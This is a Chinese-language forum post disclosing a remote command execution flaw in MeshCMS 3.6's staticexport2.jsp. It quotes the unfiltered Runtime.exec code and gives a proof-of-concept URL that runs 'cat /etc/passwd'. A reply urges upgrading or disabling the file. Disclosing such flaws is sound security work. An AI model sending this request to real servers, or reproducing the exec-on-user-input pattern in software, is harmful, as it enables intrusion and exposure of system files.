MeshCMS 3.6远程命令执行漏洞

90_

version 3.6

漏洞描述：
文件 staticexport2.jsp jsp的一个函数“exportCommand” 可以造成命令执行

[Java] 查看源码 复制代码

if (!exportCommand.equals("")) {
 
      out.println("\nexecuting: " + exportCommand);
 
      Process process = Runtime.getRuntime().exec(exportCommand);
 
      out.println("standard output:");
 
      ByteArrayOutputStream baos = new ByteArrayOutputStream();
 
      Utils.copyStream(process.getInputStream(), baos, false);
 
      out.write(Utils.encodeHTML(baos.toString()));
 
      baos.reset();
 
      out.println("end of standard output\nerror output:");
 
      Utils.copyStream(process.getErrorStream(), baos, false);
 
      out.write(Utils.encodeHTML(baos.toString()));
 
      int exit = process.waitFor();
 
out.println("end of error output\nexecution finished with exit code " +
exit);

POC:

[HTML] 查看源码 复制代码

http://127.0.0.1:8080/meshcms/meshcms/admin/staticexport2.jsp?exportBaseURL=%2Fmeshcms%2Fadmin%2Fstaticexport1.jsp&exportDir=upload&exportCheckDates=true&exportCommand=cat+%2Fetc%2Fpasswd&exportSaveConfig=true

热心网友5

看到这个漏洞，确实挺严重的。`Runtime.getRuntime().exec(exportCommand)` 直接拼接了用户输入的 `exportCommand` 参数，没有做任何过滤或校验，攻击者可以随意执行系统命令。楼主贴的POC也很清晰，直接通过GET请求就能执行 `cat /etc/passwd`。 建议使用MeshCMS 3.6的朋友尽快升级或打补丁，如果暂时无法升级，至少要在前端做好权限验证和参数过滤，或者干脆禁用 `staticexport2.jsp` 这个文件。感谢楼主分享。